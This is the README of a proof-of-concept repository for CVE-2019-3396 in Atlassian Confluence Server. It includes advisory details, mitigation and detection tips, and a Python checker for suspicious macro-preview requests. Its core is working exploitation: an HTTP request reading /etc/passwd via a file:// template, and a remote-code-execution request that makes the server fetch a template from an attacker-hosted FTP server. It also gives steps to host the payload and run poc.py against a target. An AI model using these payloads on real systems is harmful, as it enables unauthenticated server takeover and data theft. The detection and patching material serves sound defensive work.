
CVE-2019-3396 PoC — Atlassian Confluence Server Path Traversal Vulnerability

Associated Vulnerability
Title: Atlassian Confluence Server Path Traversal Vulnerability (CVE-2019-3396)
Description: The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.

Repository description: CVE-2019-3396 confluence SSTI RCE

Readme
# CVE-2019-3396
CVE-2019-3396 confluence SSTI RCE

## 🔎 What is CVE-2019-3396?

* A **critical Confluence bug** (Atlassian).
* Type: **Template Injection + Path Traversal**.
* Risk: **Remote Code Execution (RCE)** without login.
* Status: **Exploited in the wild**.

---

## 🛑 Affected Versions

* **6.6.0 → 6.6.11** ❌ vulnerable
* **6.6.12** ✅ fixed
* **6.12.0 → 6.12.2** ❌ vulnerable
* **6.12.3** ✅ fixed
* **6.13.0 → 6.13.2** ❌ vulnerable
* **6.13.3** ✅ fixed
* **6.14.0 → 6.14.1** ❌ vulnerable
* **6.14.2** ✅ fixed

👉 Always check Atlassian’s official advisory for full details.

---

## 💥 Impact

* Full **server takeover**
* **Data theft**, ransomware, crypto-miners
* Attackers can run **any code they want**

---

## 🔐 Mitigation

* ✅ **Upgrade** to a patched Confluence version (best fix)
* 🚫 Disable **Widget Connector** macro if you can’t patch right away
* 🔒 Limit access (internal only until fixed)

---

## 👀 Detection (safe tips)

* Watch logs for unusual requests to the macro/preview endpoints
* Look for unexpected processes or outbound connections from the Confluence host
* Use vulnerability scanners to confirm the running version
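As an added example (not part of this README or the repo's poc.py), a small Python checker that applies the first detection tip: it inspects proxy or WAF events that include request bodies and flags POSTs to the macro preview endpoint carrying a `_template` parameter, classifying them by URL scheme. The event format, the `url` parameter in the benign sample and the host 203.0.113.10 are constructed assumptions.

```python
import json
from urllib.parse import urlsplit

# Endpoint hit by both PoC requests shown on this page.
MACRO_PREVIEW = "/rest/tinymce/1/macro/preview"

def template_from_body(body):
    """Return macro.params._template from a JSON request body, or None if absent."""
    try:
        data = json.loads(body or "{}")
    except ValueError:
        return None
    macro = data.get("macro") if isinstance(data, dict) else None
    params = macro.get("params") if isinstance(macro, dict) else None
    template = params.get("_template") if isinstance(params, dict) else None
    return template if isinstance(template, str) else None

def classify_request(method, path, body=""):
    """Flag a POST to the macro preview endpoint whose body overrides _template.
    Normal widget previews never send _template; file:// means a local read,
    ftp/http(s) means the server was told to fetch a remote template."""
    if method.upper() != "POST" or path.split("?", 1)[0] != MACRO_PREVIEW:
        return None
    template = template_from_body(body)
    if template is None:
        return None
    scheme = urlsplit(template).scheme.lower()
    return {"template": template, "scheme": scheme,
            "remote_fetch": scheme in ("ftp", "http", "https")}

# Constructed sample events (not real traffic). The two flagged bodies mirror the
# PoC requests on this page; 203.0.113.10 is a placeholder host.
SAMPLE_EVENTS = [
    {"method": "GET", "path": "/pages/viewpage.action?pageId=1", "body": ""},
    {"method": "POST", "path": MACRO_PREVIEW,
     "body": '{"contentId":"1","macro":{"name":"widget","params":{"url":"https://www.youtube.com/watch?v=x"},"body":""}}'},
    {"method": "POST", "path": MACRO_PREVIEW,
     "body": '{"macro":{"params":{"_template":"file:///etc/passwd"}}}'},
    {"method": "POST", "path": MACRO_PREVIEW,
     "body": '{"contentId":"1","macro":{"name":"widget","params":{"_template":"ftp://203.0.113.10:8888/cmd.vm","command":"id"},"body":""}}'},
]

def scan_events(events):
    """Return (index, finding) pairs for every event classify_request flags."""
    hits = []
    for i, event in enumerate(events):
        finding = classify_request(event["method"], event["path"], event.get("body", ""))
        if finding:
            hits.append((i, finding))
    return hits
```

Running `scan_events(SAMPLE_EVENTS)` flags only the two PoC-shaped events; a `remote_fetch` hit is also the cue to check the Confluence host for outbound connections to that template URL.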

---

## 📂 Read File
```
POST /rest/tinymce/1/macro/preview HTTP/2
Host: {***}

{"macro":{"params":{"_template":"file:///etc/passwd"}}}
```

<img src="img/1.png">

## Execute Command
```
POST /rest/tinymce/1/macro/preview HTTP/2
Host: ***

{"contentId":"1","macro":{"name":"widget","params":{"_template":"ftp://***:8888/cmd.vm","command":"id"},"body":""}}
```

## Automation
* upload cmd.vm on your vps
* use ftp or https to create a link to this cmd.vm file via
```
pip install pyftpdlib
python -m pyftpdlib -p 8888
```
* update file poc.py with the new value for pyftp = "ftp://10.100.10.100:8888/cmd.vm"

```
python poc.py <url> <cmd>
python poc.py https://ip:port  "id"
```


⚠️ **TIP** — this repo is only for **education, defense, and awareness**.

---

## 🔗 References

* [Atlassian Advisory](https://confluence.atlassian.com/security) 🏢
* [NVD Entry for CVE-2019-3396](https://nvd.nist.gov/vuln/detail/CVE-2019-3396) 🛡️
